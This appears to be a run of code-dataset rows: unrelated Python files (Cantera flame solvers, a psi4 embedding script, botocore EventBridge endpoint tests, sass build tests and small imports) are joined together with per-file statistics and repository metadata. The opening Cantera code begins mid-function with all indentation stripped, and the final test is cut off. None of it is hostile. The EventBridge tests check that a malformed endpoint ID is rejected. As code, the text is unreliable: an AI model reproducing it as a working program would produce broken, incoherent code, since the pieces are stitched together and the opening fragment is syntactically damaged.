ct_prune = kwargs['ct_prune']
else:
ct_prune = 0.01
if 'ct_max_grids' in kwargs.keys():
ct_max_grids = kwargs['ct_max_grids']
else:
ct_max_grids = 5000
# case name
params = {}
params['T'] = temperature
params['p'] = pressure
params['phi'] = phi
params['a'] = a
case = params2name(params)
# pressure
pressure *= ct.one_atm
# gas object
#gas = ct.Solution(chemistry)
# construct mixutre
#mixture = cg.mixture_two_streams(gas, fuel, oxidizer, phi)
# unburnt stream
#gas.TPX = temperature, pressure, mixture
gas = cg.mixture(chemistry, fuel, oxidizer, temperature, pressure, phi)
rho_u = gas.density
# burnt stream
gas.equilibrate('HP')
rho_b = gas.density
gas = cg.mixture(chemistry, fuel, oxidizer, temperature, pressure, phi)
# get inlet velocity based on the strain rate
# $a_1=\dfrac{2U_1}{L}\left(1+\dfrac{U_2\sqrt{\rho_2}}{U_1\sqrt{\rho_1}}\right)$
# $a_2=\dfrac{2U_2}{L}\left(1+\dfrac{U_1\sqrt{\rho_1}}{U_2\sqrt{\rho_2}}\right)$
# with $\rho_1 U_1^2 = \rho_2 U_2^2$
# $a_1=\dfrac{4U_1}{L}$ $a_2=\dfrac{4U_2}{L}$
# set stream 1 and 2 for unburnt and equilibrium status respectively
v_u = a * width / 4.0
v_b = np.sqrt( rho_u*np.square(v_u) / rho_b )
# mass rate
m_u = rho_u * v_u
m_b = rho_b * v_b
# Create flame object
f = ct.CounterflowPremixedFlame(gas=gas, width=width)
f.transport_model = transport
f.P = pressure
f.reactants.mdot = m_u
f.products.mdot = m_b
f.set_refine_criteria(ratio=ct_ratio,
slope=ct_slope,
curve=ct_curve,
prune=ct_prune)
f.set_max_grid_points(f.flame, ct_max_grids)
# load saved case if presented
if solution is not None:
f.restore(solution, loglevel=loglevel)
# scaling of saved solution
solution_width = f.grid[-1] - f.grid[0]
width_factor = width / solution_width
solution_a = 4.*f.u[0]/solution_width
a_factor = a / solution_a
normalized_grid = f.grid / solution_width
u_factor = a_factor * width_factor
# update solution initialization following Fiala & Sattelmayer
f.flame.grid = normalized_grid * width
f.set_profile('u', normalized_grid, f.u*u_factor)
f.set_profile('V', normalized_grid, f.V*a_factor)
f.set_profile('lambda', normalized_grid, f.L*np.square(a_factor))
f.reactants.mdot = m_u
f.products.mdot = m_b
else:
f.set_initial_guess()
f.solve(loglevel=loglevel, auto=True)
HRR = f.heat_release_rate
idx = HRR.argmax()
if HRR[idx] > 1000 :
f.save('{}.xml'.format(case))
if f.u[idx] > 0 :
return 0
else :
return 2
else:
return 1
# %%
# pass the reactant obj, return flame obj
def counterflow_premixed_flame_(
gas,
a = 1000.,
solution = None,
**kwargs
):
# read kwargs
if 'transport' in kwargs.keys():
transport = kwargs['transport']
else:
transport = 'Mix'
if 'width' in kwargs.keys():
width = kwargs['width']
else:
width = 0.05
if 'loglevel' in kwargs.keys():
loglevel = kwargs['loglevel']
else:
# supress log output
loglevel = 0
# kwargs for flame solver
if 'ct_ratio' in kwargs.keys():
ct_ratio = kwargs['ct_ratio']
else:
ct_ratio = 2.
if 'ct_slope' in kwargs.keys():
ct_slope = kwargs['ct_slope']
else:
ct_slope = 0.2
if 'ct_curve' in kwargs.keys():
ct_curve = kwargs['ct_curve']
else:
ct_curve = 0.2
if 'ct_prune' in kwargs.keys():
ct_prune = kwargs['ct_prune']
else:
ct_prune = 0.1
if 'ct_max_grids' in kwargs.keys():
ct_max_grids = kwargs['ct_max_grids']
else:
ct_max_grids = 5000
# Create flame object
f = ct.CounterflowPremixedFlame(gas=gas, width=width)
# unburnt stream
rho_u = gas.density
# burnt stream
gas.equilibrate('HP')
rho_b = gas.density
# get inlet velocity based on the strain rate
# $a_1=\dfrac{2U_1}{L}\left(1+\dfrac{U_2\sqrt{\rho_2}}{U_1\sqrt{\rho_1}}\right)$
# $a_2=\dfrac{2U_2}{L}\left(1+\dfrac{U_1\sqrt{\rho_1}}{U_2\sqrt{\rho_2}}\right)$
# with $\rho_1 U_1^2 = \rho_2 U_2^2$
# $a_1=\dfrac{4U_1}{L}$ $a_2=\dfrac{4U_2}{L}$
# set stream 1 and 2 for unburnt and equilibrium status respectively
v_u = a * width / 4.0
v_b = np.sqrt( rho_u*np.square(v_u) / rho_b )
# mass rate
m_u = rho_u * v_u
m_b = rho_b * v_b
f.transport_model = transport
f.P = gas.P
f.reactants.mdot = m_u
f.products.mdot = m_b
f.set_refine_criteria(ratio=ct_ratio,
slope=ct_slope,
curve=ct_curve,
prune=ct_prune)
f.set_max_grid_points(f.flame, ct_max_grids)
# load saved case if presented
if solution is not None:
f.restore(solution, loglevel=loglevel)
# scaling of saved solution
solution_width = f.grid[-1] - f.grid[0]
width_factor = width / solution_width
solution_a = 4.*f.u[0]/solution_width
a_factor = a / solution_a
normalized_grid = f.grid / solution_width
u_factor = a_factor * width_factor
# update solution initialization following Fiala & Sattelmayer
f.flame.grid = normalized_grid * width
f.set_profile('u', normalized_grid, f.u*u_factor)
f.set_profile('V', normalized_grid, f.V*a_factor)
f.set_profile('lambda', normalized_grid, f.L*np.square(a_factor))
f.reactants.mdot = m_u
f.products.mdot = m_b
else:
f.set_initial_guess()
f.solve(loglevel=loglevel, auto=True)
return f
| 24.491749
| 84
| 0.587387
| 1,049
| 7,421
| 3.960915
| 0.154433
| 0.030806
| 0.046209
| 0.033694
| 0.798075
| 0.787004
| 0.774489
| 0.774489
| 0.774489
| 0.748014
| 0
| 0.026939
| 0.294704
| 7,421
| 302
| 85
| 24.572848
| 0.766909
| 0.194718
| 0
| 0.759777
| 0
| 0
| 0.065261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011173
| false
| 0
| 0.022346
| 0
| 0.055866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7fefaca0fa2d7a5baf0985769c45ef93813ec655
| 4,585
|
py
|
Python
|
pdft/tests/formic/twobasis_b3lyp/formic.py
|
ymshi449/pdft
|
5839229a4389da95319ceb05269abc635a466878
|
[
"BSD-3-Clause"
] | null | null | null |
pdft/tests/formic/twobasis_b3lyp/formic.py
|
ymshi449/pdft
|
5839229a4389da95319ceb05269abc635a466878
|
[
"BSD-3-Clause"
] | null | null | null |
pdft/tests/formic/twobasis_b3lyp/formic.py
|
ymshi449/pdft
|
5839229a4389da95319ceb05269abc635a466878
|
[
"BSD-3-Clause"
] | 2
|
2020-03-24T21:06:36.000Z
|
2021-04-22T19:34:39.000Z
|
import psi4
import numpy as np
import pdft
import matplotlib.pyplot as plt
import libcubeprop
import pickle
psi4.core.set_output_file("formic")
functional = 'b3lyp'
basis = 'cc-pvdz'
Full_Molec = psi4.geometry("""
nocom
noreorient
C 0.0000000 0.1929272 -1.9035340
O 0.0000000 1.1595219 -1.1616236
O 0.0000000 -1.0680669 -1.5349870
H 0.0000000 0.2949802 -2.9949776
H 0.0000000 -1.1409414 -0.5399614
C 0.0000000 -0.1929272 1.9035340
O 0.0000000 -1.1595219 1.1616236
O 0.0000000 1.0680669 1.5349870
H 0.0000000 -0.2949802 2.9949776
H 0.0000000 1.1409414 0.5399614
units bohr
symmetry c1
""")
Monomer_1 = psi4.geometry("""
nocom
noreorient
@C 0.0000000 0.1929272 -1.9035340
@O 0.0000000 1.1595219 -1.1616236
@O 0.0000000 -1.0680669 -1.5349870
@H 0.0000000 0.2949802 -2.9949776
@H 0.0000000 -1.1409414 -0.5399614
C 0.0000000 -0.1929272 1.9035340
O 0.0000000 -1.1595219 1.1616236
O 0.0000000 1.0680669 1.5349870
H 0.0000000 -0.2949802 2.9949776
H 0.0000000 1.1409414 0.5399614
units bohr
symmetry c1
""")
Monomer_2 = psi4.geometry("""
nocom
noreorient
C 0.0000000 0.1929272 -1.9035340
O 0.0000000 1.1595219 -1.1616236
O 0.0000000 -1.0680669 -1.5349870
H 0.0000000 0.2949802 -2.9949776
H 0.0000000 -1.1409414 -0.5399614
@C 0.0000000 -0.1929272 1.9035340
@O 0.0000000 -1.1595219 1.1616236
@O 0.0000000 1.0680669 1.5349870
@H 0.0000000 -0.2949802 2.9949776
@H 0.0000000 1.1409414 0.5399614
units bohr
symmetry c1
""")
Full_Molec.set_name("formic")
#Psi4 Options:
psi4.set_options({
# 'DFT_SPHERICAL_POINTS': 434,
# 'DFT_RADIAL_POINTS': 99,
'REFERENCE' : 'UKS'})
#Make fragment calculations:
f1 = pdft.U_Molecule(Monomer_2, basis, functional)
f2 = pdft.U_Molecule(Monomer_1, basis, functional)
mol = pdft.U_Molecule(Full_Molec, basis, functional)
#Start a pdft systemm, and perform calculation to find vp
pdfter = pdft.U_Embedding([f1, f2], mol)
#3
pdfter.find_vp_response2(maxiter=77, beta=0.1, svd_rcond=1e-3)
#data = {"drho": pdfter.drho_conv, "Ep": pdfter.ep_conv,"vp": pdfter.vp[0]}
#pickle.dump(data, open( "save.p", "wb" ), protocol=4)
pdfter.ep_conv = np.array(pdfter.ep_conv)
f,ax = plt.subplots(1,1)
ax.plot(np.log10(np.abs(pdfter.ep_conv[1:] - pdfter.ep_conv[:-1])), "o")
ax.set_title("log dEp")
f.savefig("dEp3")
#%% 2D Plot file
L = [2.0, 2.0, 2.0]
D = [0.05, 0.1, 0.1]
vp_psi4 = psi4.core.Matrix.from_array(pdfter.vp[0])
O, N = libcubeprop.build_grid(mol.wfn, L, D)
block, points, nxyz, npoints = libcubeprop.populate_grid(mol.wfn, O, N, D)
libcubeprop.compute_density(mol.wfn, O, N, D, npoints, points, nxyz, block, vp_psi4, name="formic3", write_file=True)
#4
pdfter.find_vp_response2(maxiter=77, beta=0.1, svd_rcond=1e-4)
pdfter.ep_conv = np.array(pdfter.ep_conv)
f,ax = plt.subplots(1,1)
ax.plot(np.log10(np.abs(pdfter.ep_conv[1:] - pdfter.ep_conv[:-1])), "o")
ax.set_title("log dEp")
f.savefig("dEp4")
#%% 2D Plot file
vp_psi4 = psi4.core.Matrix.from_array(pdfter.vp[0])
libcubeprop.compute_density(mol.wfn, O, N, D, npoints, points, nxyz, block, vp_psi4, name="formic4", write_file=True)
#5
pdfter.find_vp_response2(maxiter=77, beta=0.1, svd_rcond=1e-5)
pdfter.ep_conv = np.array(pdfter.ep_conv)
f,ax = plt.subplots(1,1)
ax.plot(np.log10(np.abs(pdfter.ep_conv[1:] - pdfter.ep_conv[:-1])), "o")
ax.set_title("log dEp")
f.savefig("dEp5")
#%% 2D Plot file
vp_psi4 = psi4.core.Matrix.from_array(pdfter.vp[0])
libcubeprop.compute_density(mol.wfn, O, N, D, npoints, points, nxyz, block, vp_psi4, name="formic5", write_file=True)
#6
pdfter.find_vp_response2(maxiter=77, beta=0.1, svd_rcond=1e-6)
pdfter.ep_conv = np.array(pdfter.ep_conv)
f,ax = plt.subplots(1,1)
ax.plot(np.log10(np.abs(pdfter.ep_conv[1:] - pdfter.ep_conv[:-1])), "o")
ax.set_title("log dEp")
f.savefig("dEp6")
#%% 2D Plot file
vp_psi4 = psi4.core.Matrix.from_array(pdfter.vp[0])
libcubeprop.compute_density(mol.wfn, O, N, D, npoints, points, nxyz, block, vp_psi4, name="formic6", write_file=True)
#7
pdfter.find_vp_response2(maxiter=77, beta=0.1, svd_rcond=1e-7)
pdfter.ep_conv = np.array(pdfter.ep_conv)
f,ax = plt.subplots(1,1)
ax.plot(np.log10(np.abs(pdfter.ep_conv[1:] - pdfter.ep_conv[:-1])), "o")
ax.set_title("log dEp")
f.savefig("dEp7")
#%% 2D Plot file
vp_psi4 = psi4.core.Matrix.from_array(pdfter.vp[0])
libcubeprop.compute_density(mol.wfn, O, N, D, npoints, points, nxyz, block, vp_psi4, name="formic7", write_file=True)
| 30.566667
| 117
| 0.685932
| 804
| 4,585
| 3.802239
| 0.171642
| 0.078508
| 0.082434
| 0.039254
| 0.746811
| 0.743867
| 0.743867
| 0.743867
| 0.743867
| 0.743867
| 0
| 0.223198
| 0.155725
| 4,585
| 149
| 118
| 30.771812
| 0.56652
| 0.077863
| 0
| 0.555556
| 0
| 0
| 0.354785
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
3d1a157fa07172f935b6c3f5440275e12972cfe0
| 37
|
py
|
Python
|
streamparse/bootstrap/project/fabfile.py
|
thedrow/streamparse
|
6d614434747009f16389db03f538d82733183eac
|
[
"Apache-2.0"
] | 1
|
2015-06-08T23:05:04.000Z
|
2015-06-08T23:05:04.000Z
|
streamparse/bootstrap/project/fabfile.py
|
thedrow/streamparse
|
6d614434747009f16389db03f538d82733183eac
|
[
"Apache-2.0"
] | 1
|
2020-06-25T07:11:18.000Z
|
2020-06-25T07:11:18.000Z
|
streamparse/bootstrap/project/fabfile.py
|
thedrow/streamparse
|
6d614434747009f16389db03f538d82733183eac
|
[
"Apache-2.0"
] | null | null | null |
from streamparse.ext.fabric import *
| 18.5
| 36
| 0.810811
| 5
| 37
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1801fe6be09fb40aeee5c77f7eab6754b2af5786
| 142
|
py
|
Python
|
pyserum/market/__init__.py
|
cmsholdings/pyserum
|
4aed066b5916ac622e7519a747513a6a03f551fa
|
[
"MIT"
] | null | null | null |
pyserum/market/__init__.py
|
cmsholdings/pyserum
|
4aed066b5916ac622e7519a747513a6a03f551fa
|
[
"MIT"
] | null | null | null |
pyserum/market/__init__.py
|
cmsholdings/pyserum
|
4aed066b5916ac622e7519a747513a6a03f551fa
|
[
"MIT"
] | null | null | null |
from .market import Market # noqa: F401
from .orderbook import OrderBook # noqa: F401
from .state import MarketState as State # noqa: F401
| 35.5
| 53
| 0.753521
| 20
| 142
| 5.35
| 0.45
| 0.224299
| 0.224299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077586
| 0.183099
| 142
| 3
| 54
| 47.333333
| 0.844828
| 0.225352
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
18190a05ed4bc58199deae0cdee4bb432acdf91d
| 12,347
|
py
|
Python
|
tests/functional/test_eventbridge.py
|
vemel/botocore
|
72039648c2880379e512824332c76eb5bf73ed34
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_eventbridge.py
|
vemel/botocore
|
72039648c2880379e512824332c76eb5bf73ed34
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_eventbridge.py
|
vemel/botocore
|
72039648c2880379e512824332c76eb5bf73ed34
|
[
"Apache-2.0"
] | null | null | null |
import json
import pytest
from botocore.config import Config
from botocore.exceptions import InvalidEndpointConfigurationError
from tests import BaseSessionTest, ClientHTTPStubber, requires_crt
class TestClientEvents(BaseSessionTest):
def setUp(self):
super().setUp()
self.region = "us-east-1"
def create_eventbridge_client(self, region=None, **kwargs):
if region is None:
region = self.region
client = self.session.create_client("events", region, **kwargs)
return client
def create_stubbed_eventbridge_client(self, with_default_responses=False, **kwargs):
client = self.create_eventbridge_client(**kwargs)
http_stubber = ClientHTTPStubber(client)
http_stubber.start()
if with_default_responses:
http_stubber.add_response()
http_stubber.add_response()
return client, http_stubber
def _default_put_events_args(self):
return {
"Entries": [
{
"Source": "test",
"Resources": [
"resource",
],
"DetailType": "my-detail",
"Detail": "detail",
"EventBusName": "my-bus",
},
]
}
def _assert_multi_region_endpoint(self, request, endpoint_id, suffix=None):
if suffix is None:
suffix = "amazonaws.com"
assert request.url == f"https://{endpoint_id}.endpoint.events.{suffix}/"
def _assert_sigv4a_headers(self, request):
assert request.headers["x-amz-region-set"] == b"*"
assert request.headers["authorization"].startswith(
b"AWS4-ECDSA-P256-SHA256 Credential="
)
def _assert_params_in_body(self, request, params):
assert len(params) > 0
body = json.loads(request.body)
for key, value in params:
assert body[key] == value
def test_put_event_default_endpoint(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
)
with stubber:
client.put_events(**self._default_put_events_args())
assert stubber.requests[0].url == "https://events.us-east-1.amazonaws.com/"
assert b"EndpointId" not in stubber.requests[0].body
def test_put_event_default_endpoint_explicit_configs(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
config=Config(
use_dualstack_endpoint=False,
use_fips_endpoint=False,
),
)
with stubber:
client.put_events(**self._default_put_events_args())
assert stubber.requests[0].url == "https://events.us-east-1.amazonaws.com/"
assert b"EndpointId" not in stubber.requests[0].body
@requires_crt()
def test_put_event_endpoint_id(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
)
default_args = self._default_put_events_args()
endpoint_id = "abc123.456def"
with stubber:
client.put_events(EndpointId=endpoint_id, **default_args)
self._assert_params_in_body(
stubber.requests[0],
[
("EndpointId", endpoint_id),
],
)
self._assert_multi_region_endpoint(stubber.requests[0], endpoint_id)
self._assert_sigv4a_headers(stubber.requests[0])
@requires_crt()
def test_put_event_endpoint_id_explicit_config(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
config=Config(
use_dualstack_endpoint=False,
use_fips_endpoint=False,
),
)
default_args = self._default_put_events_args()
endpoint_id = "abc123.456def"
with stubber:
client.put_events(EndpointId=endpoint_id, **default_args)
self._assert_params_in_body(
stubber.requests[0],
[
("EndpointId", endpoint_id),
],
)
self._assert_multi_region_endpoint(stubber.requests[0], endpoint_id)
self._assert_sigv4a_headers(stubber.requests[0])
@requires_crt()
def test_put_event_bad_endpoint_id(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
)
default_args = self._default_put_events_args()
endpoint_id = "badactor.com?foo=bar"
with pytest.raises(InvalidEndpointConfigurationError) as e:
client.put_events(EndpointId=endpoint_id, **default_args)
assert "EndpointId is not a valid hostname component" in str(e.value)
@requires_crt()
def test_put_event_bad_endpoint_id_explicit_config(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
config=Config(
use_dualstack_endpoint=False,
use_fips_endpoint=False,
),
)
default_args = self._default_put_events_args()
endpoint_id = "badactor.com?foo=bar"
with pytest.raises(InvalidEndpointConfigurationError) as e:
client.put_events(EndpointId=endpoint_id, **default_args)
assert "EndpointId is not a valid hostname component" in str(e.value)
@requires_crt()
def test_put_event_empty_endpoint_id(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
)
default_args = self._default_put_events_args()
endpoint_id = ""
with pytest.raises(InvalidEndpointConfigurationError) as e:
client.put_events(EndpointId=endpoint_id, **default_args)
assert "EndpointId must not be a zero length string" in str(e.value)
@requires_crt()
def test_put_event_empty_endpoint_id_explicit_config(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
config=Config(
use_dualstack_endpoint=False,
use_fips_endpoint=False,
),
)
default_args = self._default_put_events_args()
endpoint_id = ""
with pytest.raises(InvalidEndpointConfigurationError) as e:
client.put_events(EndpointId=endpoint_id, **default_args)
assert "EndpointId must not be a zero length string" in str(e.value)
def test_put_event_default_dualstack_endpoint(self):
config = Config(use_dualstack_endpoint=True, use_fips_endpoint=False)
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, config=config
)
default_args = self._default_put_events_args()
with stubber:
client.put_events(**default_args)
assert stubber.requests[0].url == "https://events.us-east-1.api.aws/"
@requires_crt()
def test_put_events_endpoint_id_dualstack(self):
config = Config(use_dualstack_endpoint=True, use_fips_endpoint=False)
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, config=config
)
default_args = self._default_put_events_args()
endpoint_id = "abc123.456def"
with stubber:
client.put_events(EndpointId=endpoint_id, **default_args)
self._assert_params_in_body(
stubber.requests[0],
[
("EndpointId", endpoint_id),
],
)
self._assert_multi_region_endpoint(
stubber.requests[0], endpoint_id, suffix="api.aws"
)
self._assert_sigv4a_headers(stubber.requests[0])
def test_put_events_default_fips_endpoint(self):
config = Config(use_dualstack_endpoint=False, use_fips_endpoint=True)
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, config=config
)
default_args = self._default_put_events_args()
with stubber:
client.put_events(**default_args)
assert stubber.requests[0].url == "https://events-fips.us-east-1.amazonaws.com/"
@requires_crt()
def test_put_events_endpoint_id_fips(self):
config = Config(use_dualstack_endpoint=False, use_fips_endpoint=True)
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, config=config
)
default_args = self._default_put_events_args()
endpoint_id = "abc123.456def"
with pytest.raises(InvalidEndpointConfigurationError) as e:
client.put_events(EndpointId=endpoint_id, **default_args)
assert "FIPS is not supported with EventBridge multi-region endpoints" in str(
e.value
)
def test_put_events_default_dualstack_fips_endpoint(self):
config = Config(use_dualstack_endpoint=True, use_fips_endpoint=True)
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, config=config
)
default_args = self._default_put_events_args()
with stubber:
client.put_events(**default_args)
assert stubber.requests[0].url == "https://events-fips.us-east-1.api.aws/"
@requires_crt()
def test_put_events_endpoint_id_dualstack_fips(self):
config = Config(use_dualstack_endpoint=True, use_fips_endpoint=True)
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, config=config
)
default_args = self._default_put_events_args()
endpoint_id = "abc123.456def"
with pytest.raises(InvalidEndpointConfigurationError) as e:
client.put_events(EndpointId=endpoint_id, **default_args)
assert "FIPS is not supported with EventBridge multi-region endpoints" in str(
e.value
)
def test_put_events_default_gov_endpoint(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
region="us-iso-east-1",
)
default_args = self._default_put_events_args()
with stubber:
client.put_events(**default_args)
assert stubber.requests[0].url == "https://events.us-iso-east-1.c2s.ic.gov/"
@requires_crt()
def test_put_events_endpoint_id_gov(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True,
region="us-iso-east-1",
)
default_args = self._default_put_events_args()
endpoint_id = "abc123.456def"
with stubber:
client.put_events(EndpointId=endpoint_id, **default_args)
self._assert_params_in_body(
stubber.requests[0],
[
("EndpointId", endpoint_id),
],
)
self._assert_multi_region_endpoint(
stubber.requests[0], endpoint_id, suffix="c2s.ic.gov"
)
self._assert_sigv4a_headers(stubber.requests[0])
def test_put_events_default_custom_endpoint(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, endpoint_url="https://example.org"
)
default_args = self._default_put_events_args()
with stubber:
client.put_events(**default_args)
assert stubber.requests[0].url == "https://example.org/"
@requires_crt()
def test_put_events_endpoint_id_custom(self):
client, stubber = self.create_stubbed_eventbridge_client(
with_default_responses=True, endpoint_url="https://example.org"
)
default_args = self._default_put_events_args()
endpoint_id = "abc123.456def"
with stubber:
client.put_events(EndpointId=endpoint_id, **default_args)
self._assert_params_in_body(
stubber.requests[0],
[
("EndpointId", endpoint_id),
],
)
assert stubber.requests[0].url == "https://example.org"
self._assert_sigv4a_headers(stubber.requests[0])
| 37.078078
| 88
| 0.645258
| 1,370
| 12,347
| 5.464964
| 0.094161
| 0.055296
| 0.051289
| 0.076132
| 0.837719
| 0.836116
| 0.8269
| 0.819287
| 0.792173
| 0.791372
| 0
| 0.010036
| 0.265652
| 12,347
| 332
| 89
| 37.189759
| 0.815705
| 0
| 0
| 0.628975
| 0
| 0
| 0.086823
| 0.001782
| 0
| 0
| 0
| 0
| 0.134276
| 1
| 0.088339
| false
| 0
| 0.017668
| 0.003534
| 0.120141
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
18535a160dd2528603827d1ee1611f1e1c00058f
| 93
|
py
|
Python
|
src/moncash/exceptions/configuration_error.py
|
MLHaiti/moncash_python
|
3b8677312306379020c36b774bbfbf39c085a7be
|
[
"MIT"
] | 15
|
2021-03-02T01:25:37.000Z
|
2022-03-12T14:20:07.000Z
|
src/moncash/exceptions/configuration_error.py
|
Wadprog/moncash_python
|
3b8677312306379020c36b774bbfbf39c085a7be
|
[
"MIT"
] | 6
|
2021-03-04T17:22:11.000Z
|
2022-03-12T16:54:43.000Z
|
src/moncash/exceptions/configuration_error.py
|
Wadprog/moncash_python
|
3b8677312306379020c36b774bbfbf39c085a7be
|
[
"MIT"
] | 3
|
2022-03-07T15:54:41.000Z
|
2022-03-12T14:24:27.000Z
|
from moncash.exceptions import MoncashError
class ConfigurationError(MoncashError):
pass
| 23.25
| 43
| 0.83871
| 9
| 93
| 8.666667
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11828
| 93
| 4
| 44
| 23.25
| 0.95122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
18608e570b1bd507855c43a1a0f9cadc97839ea4
| 23
|
py
|
Python
|
aps/distributed/__init__.py
|
ishine/aps
|
c814dc5a8b0bff5efa7e1ecc23c6180e76b8e26c
|
[
"Apache-2.0"
] | 117
|
2021-02-02T13:38:16.000Z
|
2022-03-16T05:40:25.000Z
|
aps/distributed/__init__.py
|
NormonisPing/aps
|
f646167ef768499eff0db82c55cc093ca4804d65
|
[
"Apache-2.0"
] | 3
|
2021-11-11T07:07:31.000Z
|
2021-11-20T15:25:42.000Z
|
aps/distributed/__init__.py
|
NormonisPing/aps
|
f646167ef768499eff0db82c55cc093ca4804d65
|
[
"Apache-2.0"
] | 19
|
2021-02-04T10:04:25.000Z
|
2022-02-16T05:24:44.000Z
|
from .backend import *
| 11.5
| 22
| 0.73913
| 3
| 23
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1867806a149d210a4a1f310181af82ebfd3c124c
| 3,008
|
py
|
Python
|
tests/test_include_sass.py
|
mdrachuk/lightspeed
|
ff4dc0531adfc483a0ec84a98ea308efbae6beda
|
[
"MIT"
] | 4
|
2019-08-27T19:17:44.000Z
|
2020-04-24T04:49:30.000Z
|
tests/test_include_sass.py
|
mdrachuk/lightspeed
|
ff4dc0531adfc483a0ec84a98ea308efbae6beda
|
[
"MIT"
] | 16
|
2019-08-22T14:44:10.000Z
|
2020-06-29T15:07:24.000Z
|
tests/test_include_sass.py
|
mdrachuk/lightspeed
|
ff4dc0531adfc483a0ec84a98ea308efbae6beda
|
[
"MIT"
] | null | null | null |
from pathlib import Path
import pytest
from lightweight import Site, sass
def test_render_scss_file(tmp_path: Path):
src_location = 'resources/scss/style.scss'
out_location = 'css/style.css'
test_out = tmp_path / 'out'
site = Site(url='https://example.org/')
site.add(out_location, sass(src_location))
site.generate(test_out)
assert (test_out / out_location).exists()
with open('expected/scss/style.css') as expected:
assert (test_out / out_location).read_text() == expected.read()
def test_render_scss_directory(tmp_path: Path):
src_location = 'resources/scss/styles'
out_location = 'css/nested'
test_out = tmp_path / 'out'
site = Site(url='https://example.org/')
site.add(out_location, sass(src_location))
site.generate(test_out)
assert (test_out / out_location).exists()
with open('expected/scss/nested/test1.css') as expected:
assert (test_out / 'css/nested/test1.css').read_text() == expected.read()
with open('expected/scss/nested/nested/test2.css') as expected:
assert (test_out / 'css/nested/nested/test2.css').read_text() == expected.read()
def test_render_sass_directory(tmp_path: Path):
src_location = 'resources/sass/styles'
out_location = 'css/nested'
test_out = tmp_path / 'out'
